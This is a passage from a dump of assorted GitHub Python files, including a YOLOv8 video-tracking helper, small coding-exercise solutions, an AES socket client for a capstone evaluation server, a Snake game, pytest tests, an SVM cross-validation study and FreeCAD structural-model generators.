is_display_tracker, tracker_type\n # return is_display_tracker, None\n\ndef preview_video_upload(video_name,data):\n with open(video_name, 'wb') as video_file:\n video_file.write(data)\n \n with open(video_name, 'rb') as video_file:\n video_bytes = video_file.read()\n if video_bytes:\n st.video(video_bytes)\n return video_name\n\ndef preview_finished_capture(video_name):\n if os.path.exists(video_name):\n with open(video_name, 'rb') as video_file:\n video_bytes = video_file.read()\n if video_bytes:\n st.video(video_bytes)\n\ndef format_video_results(model, video_name):\n video_results = st.session_state.video_data\n st.session_state.image_name = os.path.basename(video_name)\n # Initialize empty lists to store data\n index_list = []\n class_id_list = []\n count_list = []\n select_list = []\n\t\n\t# [0, 132, 1, 0] {0: 'Sea Cucumber', 1: 'Sea Urchin', 2: 'Starfish', 3: 'Starfish-5'}\n for idx in range(len(video_results)):\n select = True\n index_list.append(idx+1)\n class_id_list.append(model.names[idx])\n count_list.append(video_results[idx])\n select_list.append(select)\n\t\t\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Count': count_list,\n 'Select': select_list\n }\n df = pd.DataFrame(data)\n\n # Set class_id as the index\n df.set_index('Index', inplace=True)\n\n st.write(\"Video Tracking Results\")\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Count\"])\n \n excel = {}\n excel['Video'] = st.session_state.image_name\n for name in model.names:\n col1 = f\"{model.names[name]}\"\n excel[col1] = f\"{video_results[name]}\"\n \n dfex = pd.DataFrame(excel, index=[st.session_state.image_name])\n\n return dfex\n\ndef capture_uploaded_video(conf, model, fps, source_vid, destination_path):\n \"\"\"\n Plays a stored video file. Tracks and detects objects in real-time using the YOLOv8 object detection model.\n\n Parameters:\n conf: Confidence of YOLOv8 model.\n model: An instance of the `YOLOv8` class containing the YOLOv8 model.\n fps: Frame rate to sample the input video at.\n source_path: Path/input.[MP4,MPEG]\n destinantion_path: Path/output.[MP4,MPEG]\n\n Returns:\n None\n\n Raises:\n None\n \"\"\"\n with st.spinner(\"Processing Video Capture...\"):\n _, tracker = display_tracker_options()\n\n if st.sidebar.button('Detect Video Objects'):\n try:\n vid_cap = ffmpegcv.VideoCapture(source_vid)\n video_out = ffmpegcv.VideoWriter(destination_path, 'h264', vid_cap.fps*fps)\n if video_out is None:\n raise Exception(\"Error creating VideoWriter\")\n Species_Counter = [0 for n in model.names]\n Per_Counter =[0]\n frame_count = 0\n with vid_cap, video_out:\n for frame in vid_cap:\n frame_count = frame_count + 1\n results = model.track(frame, conf=conf, iou=0.2, persist=True, tracker=tracker, device=settings.DEVICE)[0]\n\n if results.boxes.id is not None:\n \n boxes = results.boxes.xyxy.cpu().numpy().astype(int)\n ids = results.boxes.id.cpu().numpy().astype(int)\n clss = results.boxes.cls.cpu().numpy().astype(int)\n\n\n for box_num in range(len(boxes)):\n \n box = boxes[box_num]\n id = ids[box_num]\n cls = clss[box_num]\n\n # use id as first array index\n # use class as second array index\n # use persistance counter as third array index\n\n\n color = (0, 255, 0)\n while id >= len(Per_Counter)-1:\n Per_Counter.append(0)\n\n Per_Counter[id] += 1\n\n if Per_Counter[id]< 10: \n color = (163, 0, 163)\n elif Per_Counter[id] == 10:\n Species_Counter[cls] += 1\n color = (255, 0, 255)\n\n\n cv2.rectangle(frame, (box[0], box[1]), (box[2], box[3]), color, 2)\n cv2.putText(\n frame,\n f\" Id:{id}\",# Class:{cls}; Conf:{round(conf,2)} \",\n (box[0], box[1]),\n cv2.FONT_HERSHEY_SIMPLEX,\n 2,\n color,\n 2)\n\n\n cv2.putText(\n frame,\n f\"Counter:{Species_Counter} -- Species:{model.names}\",\n (40,100),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1,\n (0, 255, 255),\n 4) \n video_out.write(frame)\n vid_cap.release()\n video_out.release()\n if os.path.exists(destination_path):\n print(\"Capture Done. \" + str(Species_Counter) + ' ' + str(model.names) )\n st.session_state.video_data = Species_Counter\n return True\n except Exception as e:\n import traceback\n st.sidebar.error(\"Error loading video: \" + str(e))\n traceback.print_exc()\n return False\n","repo_name":"JakeFriesen/Spectral_Detection","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":27078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"10687519440","text":"while True:\n side = sorted(list(map(int, input().split())))\n if sum(side) == 0:\n break\n elif side[2] >= side[1] + side[0]:\n print('Invalid')\n elif side[0] == side[1] == side[2]:\n print('Equilateral')\n elif side[0] == side[1] or side[1] == side[2] or side[0] == side[2]:\n print('Isosceles')\n else:\n print('Scalene')\n","repo_name":"jongpark1234/Baekjoon","sub_path":"05000/baekjoon_5073.py","file_name":"baekjoon_5073.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"17178058910","text":"# Evaluation Client script on Ultra96 to send data over to Evaluation Server\n\nimport sys\nimport socket\nimport base64\nimport time\nimport random\nimport threading\n\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\nBLOCK_SIZE = 16\nPADDING = ' '\n\n# Week 13 test: 8 moves, so 33 in total = (8*4) + 1 (logout)\n#ACTIONS = ['mermaid', 'jamesbond', 'dab', 'window360', 'cowboy', 'scarecrow', 'pushback', 'snake']\n# Week 9 and 11 tests: 3 moves, repeated 4 times each = 12 moves.\n\nclass Client(threading.Thread):\n def __init__(self, ip_addr, port_num, group_id, secret_key):\n super(Client, self).__init__()\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address = (ip_addr, port_num)\n self.secret_key = secret_key\n self.shutdown = threading.Event()\n\n '''\n Methods for Encryption before sending evaluation server\n '''\n def add_padding(self, plain_text):\n # return plain_text + b\"\\0\" + (AES.BLOCK_SIZE - len(plain_text) % AES.BLOCK_SIZE)\n pad = lambda s: s + (BLOCK_SIZE - (len(s) % BLOCK_SIZE)) * PADDING\n padded_plain_text = pad(plain_text)\n return padded_plain_text\n\n def encrypt_message(self, position, action, syncdelay):\n plain_text = '#' + position + '|' + action + '|' + syncdelay + '|'\n #print(\"Encrypting plain_text: \", plain_text)\n padded_plain_text = self.add_padding(plain_text)\n iv = Random.new().read(AES.block_size)\n aes_key = bytes(str(self.secret_key), encoding=\"utf8\")\n cipher = AES.new(aes_key, AES.MODE_CBC, iv)\n encrypted_text = base64.b64encode(iv + cipher.encrypt(bytes(padded_plain_text, \"utf8\")))\n return encrypted_text\n\n '''\n Methods to Send and Receive Data to and from evaluation server\n '''\n def send_data(self, position, action, syncdelay):\n encrypted_text = self.encrypt_message(position, action, syncdelay)\n #print(\"Sending encrypted_text: \", encrypted_text)\n self.socket.sendall(encrypted_text)\n\n # This function will be on a Thread\n def receive_dancer_position(self):\n while not self.shutdown.is_set():\n dancer_position = self.socket.recv(1024)\n print('<==========New dancer positions==========>')\n dancer_position = dancer_position.decode(\"utf8\")\n print(f\" [Dancer position] \", dancer_position)\n \n '''\n Main Start and Stop functions\n '''\n def run(self):\n self.socket.connect(self.server_address)\n receive_thread = threading.Thread(target=self.receive_dancer_position)\n receive_thread.daemon = True\n receive_thread.start()\n print(\"Evaluation client is connected!\")\n \n def stop(self):\n self.shutdown.set()\n self.socket.close()\n print('Ultra96 Client socket closed and disconnected.')\n\n\ndef main():\n if len(sys.argv) != 5:\n print('Invalid number of arguments')\n print('python eval_client.py [IP address] [Port] [groupID] [secret key]')\n sys.exit()\n\n ip_addr = sys.argv[1]\n port_num = int(sys.argv[2])\n group_id = sys.argv[3]\n secret_key = sys.argv[4]\n\n my_client = Client(ip_addr, port_num, group_id, secret_key)\n my_client.run()\n time.sleep(15)\n\n ACTIONS = ['mermaid', 'jamesbond', 'dab']\n POSITIONS = ['1 2 3', '3 2 1', '2 3 1', '3 1 2', '1 3 2', '2 1 3']\n SYNC_DELAYS = [1.23, 0.93, 1.33]\n\n count = 0\n while count < 19:\n # Send Data to Evaluation Server for Testing\n position = random.choice(POSITIONS) \n action = random.choice(ACTIONS)\n offset = min(SYNC_DELAYS) \n my_client.send_data(str(position), str(action), str(offset))\n\n # Receive Next Dancer positions from Evaluation Server\n count += 1\n time.sleep(3)\n\n my_client.stop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"CG4002-AY2122S1-B02/CG4002_Capstone","sub_path":"Comms2_External/eval_client.py","file_name":"eval_client.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"6758126149","text":"from turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\") # background\nscreen.title(\"King Python\")\nscreen.tracer(0)\n\nsnake = Snake()\nfood = Food()\nscore = Scoreboard()\n\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n snake.move()\n # detect collision with food\n if snake.head.distance(food) < 15:\n score.score_refresh()\n snake.extend()\n food.refresh()\n\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n score.reset()\n snake.reset()\n\n for segment in snake.segments[1:]:\n\n if snake.head.distance(segment) < 10:\n score.reset()\n snake.reset()\n\nscreen.exitonclick()\n","repo_name":"IYI-Pantev/Python_Sandbox","sub_path":"Snake_Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"17644618024","text":"import numpy as np\nimport pytest\nimport gemlog\nimport obspy\nimport sys\nimport os\nimport shutil\nfrom gemlog import gem_cat, convert\nfrom gemlog.core import *\nfrom gemlog.core import _convert_one_file\n\ndef setup_module():\n try:\n shutil.rmtree('tmp') # might fail if the directory doesn't exist\n except:\n pass\n os.makedirs('tmp')\n os.makedirs('tmp/raw_merged')\n os.makedirs('tmp/converted')\n os.chdir('tmp')\n print(os.getcwd())\n \ndef teardown_module():\n os.chdir('..')\n shutil.rmtree('tmp')\n\ndef test_demo_gem_cat():\n ## following is drawn as directly as possible from demo/README.md\n gem_cat('../demo_missing_gps/raw_missing_gps/', './raw_merged', '077')\n convert(rawpath = './raw_merged', convertedpath = './converted', SN = '077')\n st = obspy.read('./converted/*')\n st_ref = obspy.read('../demo_missing_gps/converted_with_gps/*')\n st.merge()\n st_ref.merge()\n ## check the start and end times\n assert np.abs(st[0].stats.starttime - st_ref[0].stats.starttime) < 1\n assert np.abs(st[0].stats.endtime - st_ref[0].stats.endtime) < 1\n ## check the number of points\n assert np.abs(st[0].stats.npts - st_ref[0].stats.npts) < 10\n ## check the amplitudes\n assert np.abs(np.std(st[0].data)/np.std(st_ref[0].data) - 1) < 0.05\n \n#test_demo_missing_gps()\n\n\n## check that gemconvert_single handles potential file problems correctly\ndef test_demo_gemconvert_single():\n with pytest.raises(MissingRawFiles):\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE9999.999') # does not exist\n\n with pytest.raises(CorruptRawFileNoGPS):\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0001.077', require_gps = True) # lacks GPS data\n\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0001.077', require_gps = False) # lacks GPS data\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0000.077', require_gps = True) # has GPS data\n\n\n","repo_name":"ajakef/gemlog","sub_path":"tests/test_integration_missing_gps.py","file_name":"test_integration_missing_gps.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"} +{"seq_id":"74870866737","text":"def anagram(s):\n if len(s) %2 != 0:\n return -1\n \n a = [*s[:len(s)//2]]\n b = [*s[len(s)//2:]]\n c = 0\n for i in a:\n if i not in b:\n c += 1\n else:\n b.remove(i) \n return c\n\n# print(anagram('xyyx'))\n\ndef makingAnagrams(s1, s2):\n s1 = list(s1)\n s2 = list(s2)\n i = 0\n while i < len(s1):\n if s1[i] in s2:\n s2.remove(s1[i])\n s1.remove(s1[i])\n continue\n i += 1\n return len(s1) + len(s2)\n\n# print(makingAnagrams('abc', 'amnop'))","repo_name":"BB-Simon/Python-all-you-need-to-know","sub_path":"problem-solving/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"11557524551","text":"# SUPPORT VECTOR MACHINE\n#\n# This file contains the functions needed to train and test different flavours of SVM classifiers, specifically\n# a linear SVM and two kernel-based SVM (polynomial and gaussian radial basis). For sake of simplicity and\n# re-usability a unique function (train_SVM) has been implemented for all three cases. The models are tested\n# using differently pre-processed data, exploiting the k-fold cross validation technique to have a better insight\n# on the performances of the models. The k-fold allowed to cross-validate different parameters used in the SVMs to\n# understand which one performed better. The minimum DCF function is used to compare the classifiers performances.\n\nimport numpy as np\nimport scipy\nfrom utility import vrow, vcol\nfrom load_data import load\nfrom preprocessing import Z_score\nfrom DCF import compute_min_DCF\nimport matplotlib.pyplot as plt\n\n\n# Definition of the polynomial kernel -> (x1 * x2 + c) ^ d + bias\n# args is a list composed of 3 elements containing c, d and bias\ndef kernel_polynomial(X1, X2, args):\n # args is a list containing three entries: c, d and bias\n c = args[0]\n d = args[1]\n bias = args[2]\n return (np.dot(X1.T, X2) + c) ** d + bias\n\n\n# Definition of the Gaussian Radial Basis kernel -> e^(-gamma * ||x1 - x2||^2) + bias\n# args is a list composed of 2 elements containing gamma and bias\ndef kernel_rbf(X1, X2, args):\n # args is a list containing two entries: gamma and bias\n gamma = args[0]\n bias = args[1]\n return np.exp(- gamma * np.linalg.norm(X1 - X2) ** 2) + bias\n\n\n# Function to compute the H matrix for both linear and kernel case\ndef compute_H(X, Z, kernel_function=None, args_kernel=None):\n H = np.zeros((X.shape[1], X.shape[1]))\n\n if kernel_function is None or args_kernel is None:\n # Linear case\n H = np.dot(X.T, X)\n H = vcol(Z) * vrow(Z) * H\n else:\n # Kernel case\n for i in range(X.shape[1]):\n for j in range(X.shape[1]):\n H[i][j] = Z[i] * Z[j] * kernel_function(X[:, i], X[:, j], args_kernel)\n return H\n\n\n# Train the generic SVM. The kernel and args_kernel arguments allow to understand the type of SVM\ndef train_SVM(DTR, LTR, DTE, C, K, pi_T, balance=False, kernel=None, args_kernel=None):\n if kernel is None or args_kernel is None:\n # Modify training data to avoid additional constrain in dual problem\n x_hat = np.vstack([DTR, K * np.ones((1, DTR.shape[1]))])\n else:\n x_hat = DTR\n\n # Compute Z mapping Ht -> 1 and Hf -> -1\n Z = 2 * LTR - 1\n\n # Compute H_hat matrix (modified version of H matrix avoiding addition constrain)\n H_hat = compute_H(x_hat, Z, kernel, args_kernel)\n\n # Dual problem function: compute function and gradient for numerical solver\n def JDual(alpha):\n Ha = np.dot(H_hat, vcol(alpha))\n aHa = np.dot(vrow(alpha), Ha)\n a1 = alpha.sum()\n return -0.5 * aHa.ravel() + a1, - Ha.ravel() + np.ones(alpha.size)\n\n # Define the L function for dual case as negative of it -> in this way we can minimize instead of maximize\n def LDual(alpha):\n loss, grad = JDual(alpha)\n return -loss, -grad\n\n # Balance the dataset\n B = np.zeros([DTR.shape[1], 2])\n if balance:\n # Compute pi empirical as samples with label 1 over the dataset dimension\n pi_emp = sum(LTR == 1) / DTR.shape[1]\n # Compute Ct and Cf\n Ct = C * pi_T / pi_emp\n Cf = C * (1 - pi_T) / (1 - pi_emp)\n # Set different boundaries depending on labels\n B[LTR == 1, 1] = Ct\n B[LTR == 0, 1] = Cf\n else:\n B[:, 1] = C\n\n # Compute the optimal alpha\n alpha_star, _, _ = scipy.optimize.fmin_l_bfgs_b(LDual, np.zeros(DTR.shape[1]),\n approx_grad=False, bounds=B, factr=10000.0)\n\n # Compute scores\n if kernel is None or args_kernel is None:\n # Linear case\n w_star = np.dot(x_hat, vcol(alpha_star) * vcol(Z))\n # Compute extended data matrix for test dataset\n T_hat = np.concatenate((DTE, K * np.array(np.ones([1, DTE.shape[1]]))))\n # Compute score as dot product between w and extended test matrix\n S = np.dot(w_star.T, T_hat)\n else:\n # Kernel case\n kernel_mat = np.zeros([DTR.shape[1], DTE.shape[1]])\n # Compute matrix storing the dot product of the kernel function\n for index1 in range(DTR.shape[1]):\n for index2 in range(DTE.shape[1]):\n kernel_mat[index1, index2] = kernel(DTR[:, index1], DTE[:, index2], args_kernel)\n # Compute score\n S = np.sum((alpha_star * Z).reshape([DTR.shape[1], 1]) * kernel_mat, axis=0)\n\n return S.ravel()\n\n\n# Perform k-fold cross validation on test data for the specified model\ndef k_fold(Data, Labels, K, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=False, kernel=None, args_kernel=None, seed=0):\n # Number of samples of a single fold\n fold_dim = Data.shape[1] // K\n start_idx = 0\n\n # Shuffle data\n np.random.seed(seed)\n idx = np.random.permutation(Data.shape[1])\n\n # Define array as long as the training data since with K fold all samples are used to test the model\n llr = np.zeros((Data.shape[1],))\n\n for i in range(K):\n # Define the end of the test fold\n # Manage the case last fold is smaller than the others\n if start_idx + fold_dim > Data.shape[1]:\n end_idx = Data.shape[1]\n else:\n end_idx = start_idx + fold_dim\n\n # Define index of train as everything outside (start_index, end_idx)\n idxTrain = np.concatenate((idx[0:start_idx], idx[end_idx:]))\n idxTest = idx[start_idx:end_idx]\n\n # Define train samples and labels\n DTR = Data[:, idxTrain]\n LTR = Labels[idxTrain]\n\n # Define test samples\n DTE = Data[:, idxTest]\n\n # Train the classifier and compute llr on the current partition\n llr[idxTest] = train_SVM(DTR, LTR, DTE, C, K_SVM, pi_T, balance, kernel, args_kernel)\n\n # Update fold index\n start_idx += fold_dim\n\n # Compute minimum DCF\n minDCF, _ = compute_min_DCF(llr, Labels, pi, Cfn, Cfp)\n\n return minDCF, llr\n\n\nif __name__ == '__main__':\n # Load data\n D, L = load(\"../Data/Train.txt\")\n DN = Z_score(D)\n DG = np.load(\"../Data/gaus_data/gaus_train.npy\")\n\n # Define parameters\n pi_T = 0.5\n pi = 0.5\n Cfn = 1\n Cfp = 1\n k = 5\n K_SVM = 1\n C_val = [1e-1, 1, 10]\n\n # Linear\n fileName = \"../Results/linear_SVM_results.txt\"\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\n1e-2 \\t1e-1 \\t1 \\t10 \\t100 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + str(balance) + \"\\n\")\n f_in.write(\"\\nRAW\\n\")\n dcf_raw = list()\n for C in C_val:\n minDCF, _ = k_fold(D, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_raw.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nGaussianized\\n\")\n dcf_gaus = list()\n for C in C_val:\n minDCF, _ = k_fold(DG, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance)\n dcf_gaus.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n if balance:\n imgName = \"SVM_linear_balanced.png\"\n else:\n imgName = \"SVM_linear_unbalanced.png\"\n\n plt.figure()\n plt.plot(C_val, dcf_raw, marker='o', linestyle='dashed', color=\"red\")\n plt.plot(C_val, dcf_z, marker='o', linestyle='dashed', color=\"blue\")\n plt.plot(C_val, dcf_gaus, marker='o', linestyle='dashed', color=\"green\")\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.legend([\"Raw\", \"Z-normalized\", \"Gaussianized\"])\n plt.savefig(\"../Images/\" + imgName)\n print(\"Linear SVM \\t\\t DONE\")\n\n # Polynomial Kernel\n fileName = \"../Results/polynomial_SVM_results.txt\"\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\n1e-2 \\t1e-1 \\t1 \\t10 \\t100 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + str(balance) + \"\\n\")\n f_in.write(\"\\nRAW\\n\")\n dcf_raw = list()\n for C in C_val:\n minDCF, _ = k_fold(D, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_raw.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n f_in.write(\"\\nGaussianized\\n\")\n dcf_gaus = list()\n for C in C_val:\n minDCF, _ = k_fold(DG, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=balance,\n kernel=kernel_polynomial, args_kernel=[1, 2, K_SVM ** 0.5])\n dcf_gaus.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n\n if balance:\n imgName = \"SVM_polynomial_balanced.png\"\n else:\n imgName = \"SVM_polynomial_unbalanced.png\"\n\n plt.figure()\n plt.plot(C_val, dcf_gaus, marker='o', linestyle='dashed', color=\"red\")\n\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.savefig(\"../Images/\" + imgName)\n print(\"Quadratic SVM \\t\\t DONE\")\n\n # RBF Kernel\n fileName = \"../Results/RBG_SVM_results.txt\"\n gamma = [np.exp(-1), np.exp(-2)]\n\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\t1e-1 \\t1 \\t10 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + str(balance) + \"\\n\")\n complete_z = list()\n complete_gaus = list()\n for g in gamma:\n f_in.write(\"\\n\\nGamma: \" + str(g) + \"\\n\")\n f_in.write(\"\\nZ-normalized - no PCA\\n\")\n dcf_z = list()\n for C in C_val:\n minDCF, _ = k_fold(DN, L, k, pi, Cfp, Cfn, C, pi_T, K_SVM,\n balance=balance,\n kernel=kernel_rbf, args_kernel=[g, K_SVM ** 0.5])\n dcf_z.append(minDCF)\n f_in.write(str(round(minDCF, 3)) + \"\\t\")\n complete_z.append(dcf_z)\n\n if balance:\n img = \"SVM_RBF_balance.png\"\n else:\n img = \"SVM_RBF_unbalance.png\"\n\n plt.figure()\n plt.plot(C_val, complete_z[0], marker='o', linestyle='dashed', color=\"red\")\n plt.plot(C_val, complete_z[1], marker='o', linestyle='dashed', color=\"blue\")\n\n plt.xscale(\"log\")\n plt.xlabel(\"C\")\n plt.ylabel(\"min DCF\")\n plt.legend([r\"$log \\gamma = -1$\",\n r\"$log \\gamma = -2$\"])\n plt.savefig(\"../Images/\" + img)\n print(\"RBF SVM \\t\\t DONE\")\n\n","repo_name":"PietroMacori/machine-learning-exam","sub_path":"src/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":11682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"36019626040","text":"# 강의실 개수만 구했으~\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\n\ndp = [0] * 28\nrooms = []\nfor i in range(N):\n rooms.append(list(map(int, input().split())))\n\nrooms = sorted(rooms, key = lambda x: x[2])\ndata = [0] * (N+1)\n\nfor room in rooms:\n num, start, end = room\n for i in range(start, end + 1) :\n dp[i] += 1\n data[num] = max(dp)\n\nprint('필요한 강의실 출력')\nprint(max(dp))\n\nprint('강의 끝나는 순서대로 출력')\nprint(rooms)","repo_name":"jocy0412/jungle","sub_path":"jungle04/test/03_1379.py","file_name":"03_1379.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"34845188052","text":"# Step file ops\nimport members\nimport random\nimport colormaps\nfrom numpy import linspace\n\nimport openpyxl\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\nimport pandas as pd\n\n\n# make allpoint\n# p1 = FreeCAD.Vector(1000, 0, 0)\n\n# importHeader = [['import Draft, Arch']]\n\ndef pointCloud(reg):\n lst = []\n for i, point in enumerate(reg['Point']):\n lst.append(['p' + point.name + ' = FreeCAD.Vector' + '(' + str(round(point.x * 1000)) +\n ',' + str(round(point.y * 1000)) + ',' + str(round(point.z * 1000)) + ')'])\n return lst\n\n\ndef beamGen(reg, sections=False, colour=False):\n # sections = 50 makes all pipes with 50 diam\n lst = []\n\n for i, beam in enumerate(reg['Beam']):\n lst.append(['Line' + str(i) + ' = Draft.makeWire([' + 'p' + beam.start.name + ',p' + beam.end.name + '])'])\n if isinstance(sections, bool):\n if sections:\n if isinstance(beam.section, members.Tube):\n lst.append(['Arch.makePipe(Line' + str(i) + ',' + str(\n round(beam.section.diam * 10, 2)) + ').WallThickness=' + str(\n round(beam.section.thick * 10, 2))])\n # General pipe section for all beams\n elif isinstance(sections, list):\n lst.append(['Arch.makePipe(Line' + str(i) + ',' + str(sections[0]) + ')'])\n return lst\n\n\ndef beamgroup(reg, sections=True, colour=False, mix=False, export=False):\n lst = []\n # colour = (120, 120, 120)\n group_selection = ['BR1', 'HSP', 'JLT', 'LG1', 'LTR', 'PAD', 'SLE', 'VP', 'YK2', 'YK1']\n\n def coloursel(n, total=len(group_selection), colourmap=colormaps.Spectral, invert=False):\n # print(int(n / total * len(colourmap)))\n #\n sequence = linspace(0, len(colourmap) - 1, total)\n if invert:\n colourmap = colourmap[::-1]\n\n expanded_seq = [int(value) for value in sequence]\n print(len(colourmap), n, expanded_seq[n])\n\n return colourmap[expanded_seq[n]]\n\n if mix:\n size = len(group_selection)\n sequence = random.sample(list(range(size)), size)\n print(sequence)\n\n data = []\n for i, group in enumerate(reg['Group']):\n if group.name in group_selection:\n\n if colour:\n if mix:\n colour = coloursel(sequence[group_selection.index(group.name)])\n else:\n colour = coloursel(group_selection.index(group.name))\n print(colour)\n\n beam0 = group.elem[0]\n\n data.append([group.name, 'Group Name', 'Material', beam0.section.diam, beam0.section.thick, colour])\n\n for j, beam in enumerate(group.elem):\n if isinstance(beam.section, members.Tube):\n\n lst.append(\n ['Line0' + str(i) + str(\n j) + ' = Draft.makeWire([' + 'p' + beam.start.name + ',p' + beam.end.name + '])'])\n\n if sections:\n diameter = round(beam.section.diam * 10, 2)\n else:\n diameter = 30\n\n lst.append(['Pipe=Arch.makePipe(Line0' + str(i) + str(j) + ',' + str(diameter) + ')'])\n\n if sections:\n lst.append([f'Pipe.WallThickness={str(round(beam.section.thick * 10, 2))}'])\n\n lst.append([f'Pipe.ViewObject.ShapeColor = {colour}'])\n\n export_list_to_excel(data, 'output.xlsx')\n\n return lst\n\n # read from excel or txt - create folder with joints\n # export to abaqus #TODO MAYBE\n\n\ndef jointGen(reg, nodelst=None, inputfile='xls', sections=False, stub_len=2, folder=False):\n lst = []\n print(stub_len)\n # INPUT TYPE - xls,or txt\n if inputfile == 'xls':\n # get from excel\n print('excel')\n else:\n # get input from txt,csv\n print('Nodes from txt')\n # If not joints specified populates with all joints\n if nodelst is None:\n nodelst = []\n for joint in reg['Joint']:\n nodelst.append(joint.point.name)\n # DO for selected joints\n i = len(members.reg['Beam']) + 1\n print('entrou')\n for node_name in nodelst:\n for joint in reg['Joint']:\n # print(node_name,joint.point.name)\n if joint.point.name == node_name:\n for beam in joint.beams:\n # Check which stub length to use\n if hasattr(beam.section, \"diam\"):\n print('stub check')\n # print(stub_len*beam.section.diam*0.01,beam.length())\n\n # stub =stub_len * beam.section.diam * 0.01\n stub = min(beam.length(), 0.8)\n print('stub used', stub)\n if beam.start == joint.point:\n vec = members.Vector(beam.start, beam.end)\n else:\n vec = members.Vector(beam.end, beam.start)\n # print('vec',vec.dim)\n pivot = vec.node_along(point='A', dist=stub) # TODO not just for tubular\n # print('BeamA',beam.start.pos)\n # print('pivot',pivot.pos)\n # print('thickness',beam.section.thick)\n\n auxi = f'FreeCAD.Vector{tuple([round(x * 1000) for x in pivot.pos])}'\n lst.append([f'Line{i} = Draft.makeWire([p{joint.point.name},{auxi}])'])\n _str = f'Wire = Arch.makePipe(Line{i},{round(beam.section.diam * 10)},' \\\n f'{beam.section.thick * 10})'\n _str += f'.WallThickness={beam.section.thick * 10}'\n lst.append([_str])\n elif hasattr(beam.section, \"height\"):\n stub = str(stub_len * beam.section.height)\n else:\n stub = str(300)\n print(f'using default stub for {beam.section.name}')\n if folder:\n lst.append([f'folder.addObject(Wire)'])\n i += 1\n # ('aqui', lst)\n return lst\n\n # Line = Draft.makeWire([p1, p2, p3, p4])\n\n\ndef jointSpheres(reg, nodelst=None, diam=200, colour='saipem'):\n # nodelst=[]\n saipem = (0, 85, 127)\n transparency = 50\n lst = ['doc=FreeCAD.ActiveDocument']\n if nodelst is None:\n print('here')\n for i, joint in enumerate(members.reg['Joint']):\n if i > 5:\n return lst\n else:\n position = tuple([xyz * 1000 for xyz in joint.point.pos])\n lst.append([f'Sphere{i} = Part.makeSphere({diam * 0.5},FreeCAD.Vector{position})'])\n lst.append('sphere = doc.addObject(\"Part::Feature\", \"Sphere\")')\n lst.append(f'sphere.Shape = 